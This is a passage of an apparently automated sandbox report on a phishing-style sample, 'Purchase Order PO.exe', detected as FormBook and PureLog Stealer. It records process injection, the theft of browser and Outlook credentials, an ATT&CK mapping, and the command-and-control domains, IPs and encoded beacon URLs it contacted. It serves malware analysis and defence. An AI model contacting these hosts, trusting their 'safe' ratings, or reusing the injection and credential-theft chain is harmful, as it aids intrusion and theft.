                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtClose: Direct from: 0x76EF2B6C
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory written: C:\Users\user\Desktop\Purchase Order PO.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: NULL target: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\isoburn.exeThread register set: target process: 7164Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"Jump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: GDDZlGeaCapsK.exe, 00000005.00000000.2361483085.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000005.00000002.3283577241.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000008.00000002.3284162768.00000000018F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                      Source: GDDZlGeaCapsK.exe, 00000005.00000000.2361483085.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000005.00000002.3283577241.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000008.00000002.3284162768.00000000018F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: GDDZlGeaCapsK.exe, 00000005.00000000.2361483085.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000005.00000002.3283577241.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000008.00000002.3284162768.00000000018F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: GDDZlGeaCapsK.exe, 00000005.00000000.2361483085.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000005.00000002.3283577241.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000008.00000002.3284162768.00000000018F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Users\user\Desktop\Purchase Order PO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3284014687.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3284352554.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2438402201.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3286346914.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3284154909.0000000003170000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2439723626.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.40538a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.5a60000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.4033880.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.5a60000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.4033880.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.3fe0060.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.40538a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2072668153.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2070921717.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2070921717.0000000004053000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3284014687.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3284352554.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2438402201.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3286346914.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3284154909.0000000003170000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2439723626.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.40538a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.5a60000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.4033880.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.5a60000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.4033880.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.3fe0060.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order PO.exe.40538a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2072668153.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2070921717.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2070921717.0000000004053000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		412
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		4
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		5
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture5
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563856 Sample: Purchase Order PO.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 31 www.cyperla.xyz 2->31 33 cyperla.xyz 2->33 35 6 other IPs or domains 2->35 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected PureLog Stealer 2->47 49 Yara detected FormBook 2->49 53 7 other signatures 2->53 10 Purchase Order PO.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\...\Purchase Order PO.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 Purchase Order PO.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 GDDZlGeaCapsK.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 isoburn.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 GDDZlGeaCapsK.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 cyperla.xyz 31.186.11.114, 49786, 80 BETAINTERNATIONALTR Turkey 23->37 39 www.madhf.tech 103.224.182.242, 49861, 49869, 49876 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 23->39 41 3 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Purchase Order PO.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
                      Purchase Order PO.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.cstrategy.online/qx5d/?aX8p=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC0%Avira URL Cloudsafe
                      http://www.bser101pp.buzz/v89f/0%Avira URL Cloudsafe
                      http://www.cyperla.xyz/qygv/?VF=6pChKdZP-&aX8p=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgsaqMlEMjEoKLMxsODg9Mufes6Fo8jzqPd1fmEliYc3z1g==0%Avira URL Cloudsafe
                      http://www.madhf.tech/6ou6/0%Avira URL Cloudsafe
                      http://www.bser101pp.buzz/v89f/?aX8p=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwJAbzgbWQC+UfE7zMLLi7rmhPg9Rv0rLNpU4Xsyq1J6Z3g==&VF=6pChKdZP-0%Avira URL Cloudsafe
                      http://www.madhf.tech/6ou6/?VF=6pChKdZP-&aX8p=We72k2U8RqyHNx9c0lgrcMajP0%Avira URL Cloudsafe
                      http://www.madhf.tech/6ou6/?VF=6pChKdZP-&aX8p=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/UnDqMtKwbhA7qdtFmnjL5G+EcoCGS9edu4uK8ABvFKG4A==0%Avira URL Cloudsafe
                      http://www.cstrategy.online/qx5d/0%Avira URL Cloudsafe
                      http://www.goldstarfootwear.shop/8m07/0%Avira URL Cloudsafe
                      http://www.goldstarfootwear.shop0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      goldstarfootwear.shop
                      		3.33.130.190
                      		truefalse
                        		unknown
                        cstrategy.online
                        		194.76.119.60
                        		truefalse
                          		unknown
                          www.madhf.tech
                          		103.224.182.242
                          		truefalse
                            		high
                            cyperla.xyz
                            		31.186.11.114
                            		truetrue
                              		unknown
                              www.bser101pp.buzz
                              		172.67.158.106
                              		truefalse
                                		unknown
                                www.cstrategy.online
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.goldstarfootwear.shop
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.cyperla.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.bser101pp.buzz/v89f/?aX8p=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwJAbzgbWQC+UfE7zMLLi7rmhPg9Rv0rLNpU4Xsyq1J6Z3g==&VF=6pChKdZP-false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.goldstarfootwear.shop/8m07/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.cyperla.xyz/qygv/?VF=6pChKdZP-&aX8p=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgsaqMlEMjEoKLMxsODg9Mufes6Fo8jzqPd1fmEliYc3z1g==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.madhf.tech/6ou6/?VF=6pChKdZP-&aX8p=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/UnDqMtKwbhA7qdtFmnjL5G+EcoCGS9edu4uK8ABvFKG4A==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.bser101pp.buzz/v89f/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.madhf.tech/6ou6/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.cstrategy.online/qx5d/false
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabisoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoisoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.pixabay.com/photo/2017/02/12/21/29/false-2061132_640.pngPurchase Order PO.exefalse
                                                		high
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.cstrategy.online/qx5d/?aX8p=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RCisoburn.exe, 00000006.00000002.3285673659.0000000005AC6000.00000004.10000000.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000008.00000002.3284706546.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.madhf.tech/6ou6/?VF=6pChKdZP-&aX8p=We72k2U8RqyHNx9c0lgrcMajPGDDZlGeaCapsK.exe, 00000008.00000002.3284706546.00000000039E8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.ecosia.org/newtab/isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.goldstarfootwear.shopGDDZlGeaCapsK.exe, 00000008.00000002.3286346914.000000000577E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
